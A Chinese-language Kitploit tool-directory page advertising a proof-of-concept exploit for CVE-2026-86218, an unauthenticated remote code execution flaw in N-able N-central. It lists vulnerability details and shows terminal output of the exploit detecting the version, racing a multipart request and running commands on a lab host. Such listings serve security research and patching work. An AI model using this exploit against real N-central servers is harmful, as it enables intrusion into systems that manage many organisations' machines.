Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-86218 — 针对 CVE-2026-86218 的概念验证漏洞利用,该漏洞是通过 Struts BeanUtils 在 N-able N-central 中实现的未认证 RCE,具备版本检测和命令执行功能。 | Kitploit
工具/GitHubGitHub/udyz/cve-2026-86218
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试远程访问工具Payload 开发
GitHubudyz/cve-2026-86218

CVE-2026-86218

针对 CVE-2026-86218 的概念验证漏洞利用,该漏洞是通过 Struts BeanUtils 在 N-able N-central 中实现的未认证 RCE,具备版本检测和命令执行功能。

查看仓库
2天前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2026-86218

CVE-2026-86218 - N-able N-central Struts BeanUtils 未认证 RCE

CVECVE-2026-86218
CVSS10.0(严重)
受影响N-central 本地部署 < 2026.3.1.14(包括 Hotfix 3)
已修复2026.3 Hotfix 4(build 2026.3.1.14)
披露日期2026-09-05
CWECWE-96(静态代码注入)
利用情况已在野利用(CISA KEV)
root@kitploit:~
[*] Running version check ...
[*] Detected N-central version: 2026.3.1.10
[*] Vulnerable: True
[*] Target    : https://nc.lab:443
[*] Servlet   : LogRetrieval
[*] Trigger   : https://nc.lab:443/LogRetrieval/WEB-INF/web.xml
[*] Marker    : ecbddf8d8fe83376aabb4f1e81efd2d2
[+] JSESSIONID: node01bhudsdf7jmpktsh6e0qhjtsk185448.node0
[*] Padding prefix: 49847 bytes
[*] Body size     : 63849 bytes
[*] Split offset  : 50241 / 64142
[*] Sent partial request; sleeping 0.35s ...
[*] Helper response: HTTP 200
[*] Sent remaining mutation fields
[*] Mutation response head:
HTTP/1.1 200 OK
[*] Multipart race completed.
[*] Sending payload via LogRetrieval ...
[+] Response:
uid=984(nable) gid=984(nable) groups=984(nable) context=system_u:system_r:unconfined_service_t:s0
Linux nc.lab 5.14.0-611.54.3.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Thu May 7 16:31:24 EDT 2026 x86_64 x86_64 x86_64 GNU/Linux
ecbddf8d8fe83376aabb4f1e81efd2d2

[+] Marker observed in response — payload launched.
下载工具